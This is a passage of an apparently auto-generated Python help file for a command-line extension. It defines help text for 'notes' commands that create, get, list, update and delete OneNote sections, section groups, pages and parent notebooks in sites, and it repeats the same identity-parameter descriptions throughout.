sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display 